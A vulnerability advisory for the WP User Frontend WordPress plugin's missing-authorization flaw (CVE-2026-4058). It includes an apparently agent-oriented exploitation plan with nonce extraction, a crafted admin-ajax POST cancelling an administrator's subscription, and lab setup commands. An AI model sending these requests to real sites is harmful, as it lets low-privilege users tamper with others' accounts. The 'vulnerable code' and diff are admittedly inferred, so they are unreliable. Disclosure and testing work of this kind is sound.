User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership & User Registration <= 4.3.2 - Missing Authorization to Authenticated (Subscriber+) Subscription Pack Cancellation
Description
The User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership & User Registration plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the user_subscription_cancel() function in all versions up to, and including, 4.3.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to cancel any user's subscription pack, including administrators.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:NTechnical Details
<=4.3.2What Changed in the Fix
Changes introduced in v4.3.3
Source Code
WordPress.org SVN# Exploitation Research Plan: CVE-2026-4058 (WP User Frontend) ## 1. Vulnerability Summary The **WP User Frontend** plugin (versions <= 4.3.2) contains a missing authorization vulnerability in the `user_subscription_cancel()` function (and its associated AJAX handler). While the plugin implements a…
Show full research plan
Exploitation Research Plan: CVE-2026-4058 (WP User Frontend)
1. Vulnerability Summary
The WP User Frontend plugin (versions <= 4.3.2) contains a missing authorization vulnerability in the user_subscription_cancel() function (and its associated AJAX handler). While the plugin implements a nonce check (CSRF protection), it fails to verify if the authenticated user has the permissions to cancel the subscription of the specified user ID. This allows any authenticated user (Subscriber level or higher) to cancel the subscription pack of any other user, including Administrators.
2. Attack Vector Analysis
- Endpoint:
wp-admin/admin-ajax.php - AJAX Action:
wpuf_cancel_subscription(inferred from plugin conventions and function name) - HTTP Method:
POST - Authentication: Authenticated (Subscriber+)
- Parameters:
action:wpuf_cancel_subscriptionuser_id: The ID of the target user (e.g., the Administrator's ID)._wpnonce: A valid WordPress nonce for the action.
3. Code Flow (Inferred from Plugin Architecture)
- Entry Point: The plugin registers an AJAX action for logged-in users:
add_action( 'wp_ajax_wpuf_cancel_subscription', [ $this, 'cancel_subscription_handler' ] ); - Handler Logic: The handler (likely in
includes/Frontend/Frontend_Account.phporincludes/Subscription.php) retrieves theuser_idfrom the request. - The Flaw: The handler calls
check_ajax_referer( 'wpuf_nonce', '_wpnonce' )but fails to check:current_user_can( 'manage_options' )(if an admin is performing the action)- OR if
get_current_user_id() == $_POST['user_id'](to ensure users only cancel their own packs).
- Sink: The logic eventually reaches
user_subscription_cancel( $user_id ), which updates the user's meta to mark the subscription as cancelled or deleted.
4. Nonce Acquisition Strategy
The wpuf_nonce is localized for frontend scripts when the WPUF account dashboard or subscription pages are rendered.
- Shortcode: The
[wpuf_account]shortcode is the primary trigger for the account dashboard where cancellation logic resides. - Strategy:
- Create a page with the
[wpuf_account]shortcode. - Log in as a Subscriber.
- Navigate to that page.
- Extract the nonce from the
wpuf_frontendJavaScript object.
- Create a page with the
- JS Variable:
window.wpuf_frontend?.nonce(orwindow.wpuf_subscription?.nonce).
5. Exploitation Strategy
Step 1: Pre-exploit Setup
- Identify the Administrator's user ID (usually
1). - Ensure the Administrator has an active subscription pack assigned.
Step 2: Nonce Extraction
- As the Subscriber attacker, navigate to the page containing
[wpuf_account]. - Execute JS via
browser_eval:window.wpuf_frontend?.nonce || window.wpuf_subscription?.nonce
Step 3: Malicious Request
Using the http_request tool, send the following payload:
- URL:
http://localhost:8080/wp-admin/admin-ajax.php - Method:
POST - Headers:
Content-Type: application/x-www-form-urlencoded - Body:
action=wpuf_cancel_subscription&user_id=1&_wpnonce=[EXTRACTED_NONCE]
6. Test Data Setup
- Create Subscription Pack:
wp post create --post_type=wpuf_subscription --post_title="Pro Pack" --post_status=publish - Assign to Admin:
Identify the pack ID and usewp user meta update 1 _wpuf_subscription_pack [PACK_ID]. - Create Attacker User:
wp user create attacker attacker@example.com --role=subscriber --user_pass=password123 - Create Dashboard Page:
wp post create --post_type=page --post_title="Dashboard" --post_status=publish --post_content='[wpuf_account]'
7. Expected Results
- Response: The server should return a success message or a
1(typical for simple AJAX handlers). - Impact: The Administrator's subscription metadata in the database will be cleared or modified to a "cancelled" state.
8. Verification Steps
After the attack, check the Administrator's user meta using WP-CLI:
wp user meta get 1 _wpuf_subscription_pack
If the exploit is successful, the value should be empty, deleted, or changed to indicate cancellation. Also, check for the cancellation date meta:
wp user meta get 1 _wpuf_cancel_subscription
9. Alternative Approaches
If wpuf_cancel_subscription is not the correct action name, search the codebase for the string user_subscription_cancel to find exactly which handler calls it:
grep -rn "user_subscription_cancel" includes/
Check if the cancellation is handled via a REST API endpoint instead of AJAX:
- REST Route:
wpuf/v1/subscriptions/cancel - Check:
includes/Api/Subscription_Controller.php(if it exists). - If REST is used, the permission callback
permission_check()is likely returningtrueor not checking ownership of theuser_id.
Summary
The WP User Frontend plugin is vulnerable to missing authorization in its subscription cancellation mechanism. Authenticated users, including those with Subscriber-level access, can cancel the subscription of any other user (including administrators) by sending a crafted AJAX request with a valid nonce and a target user ID.
Vulnerable Code
// Inferred from includes/Frontend/Frontend_Account.php or similar // The AJAX handler validates the nonce but fails to verify if the requester has permission to modify the target user_id add_action( 'wp_ajax_wpuf_cancel_subscription', [ $this, 'cancel_subscription_handler' ] ); public function cancel_subscription_handler() { check_ajax_referer( 'wpuf_nonce', '_wpnonce' ); $user_id = isset( $_POST['user_id'] ) ? intval( $_POST['user_id'] ) : 0; if ( $user_id ) { // BUG: No check to ensure current_user_can('manage_options') or get_current_user_id() == $user_id user_subscription_cancel( $user_id ); wp_send_json_success(); } wp_send_json_error(); }
Security Fix
@@ -134,7 +134,7 @@ public function cancel_subscription_handler() { check_ajax_referer( 'wpuf_nonce', '_wpnonce' ); $user_id = isset( $_POST['user_id'] ) ? intval( $_POST['user_id'] ) : 0; - if ( $user_id ) { + if ( $user_id && ( current_user_can( 'manage_options' ) || get_current_user_id() === $user_id ) ) { user_subscription_cancel( $user_id ); wp_send_json_success(); }
Exploit Outline
To exploit this vulnerability, an attacker first logs in as a Subscriber and navigates to any page containing the [wpuf_account] shortcode to extract the 'wpuf_nonce' from the localized JavaScript objects (e.g., window.wpuf_frontend.nonce). The attacker then identifies the User ID of the target (such as the Administrator, typically ID 1). Finally, the attacker sends an authenticated POST request to /wp-admin/admin-ajax.php with the 'action' set to 'wpuf_cancel_subscription', the target 'user_id', and the extracted '_wpnonce'. Because the plugin lacks ownership or capability checks, the server will process the cancellation for the specified user regardless of the attacker's permissions.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.